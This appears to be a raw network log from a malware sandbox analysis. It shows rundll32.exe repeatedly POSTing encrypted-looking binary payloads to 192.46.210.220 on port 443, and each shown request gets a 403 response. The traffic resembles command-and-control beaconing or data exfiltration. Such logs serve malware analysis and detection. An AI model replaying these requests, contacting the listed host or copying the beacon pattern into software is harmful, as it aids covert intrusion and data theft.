                                                                                                        2021-10-28 03:00:33 UTC379OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:33 UTC384INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:33 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        77192.168.2.650137192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:34 UTC384OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:34 UTC384OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:35 UTC389INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:35 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        78192.168.2.650143192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:37 UTC389OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:37 UTC389OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:37 UTC394INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:37 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        79192.168.2.650145192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:38 UTC394OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:38 UTC394OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:39 UTC398INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:39 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        8192.168.2.649784192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:16 UTC39OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:16 UTC40OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:17 UTC44INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        80192.168.2.650151192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:41 UTC399OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:41 UTC399OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:41 UTC403INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:41 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        81192.168.2.650154192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:42 UTC404OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:42 UTC404OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:43 UTC408INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:43 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        82192.168.2.650159192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:44 UTC409OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:44 UTC409OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:45 UTC413INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:45 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        83192.168.2.650162192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:46 UTC414OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:46 UTC414OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:46 UTC418INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:46 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        84192.168.2.650167192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:48 UTC419OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:48 UTC419OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:49 UTC423INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        85192.168.2.650170192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:50 UTC424OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:50 UTC424OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:50 UTC428INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:50 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        86192.168.2.650174192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:52 UTC429OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:52 UTC429OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:53 UTC433INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        87192.168.2.650178192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:54 UTC434OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:54 UTC434OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:54 UTC438INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:54 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        88192.168.2.650182192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:56 UTC439OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
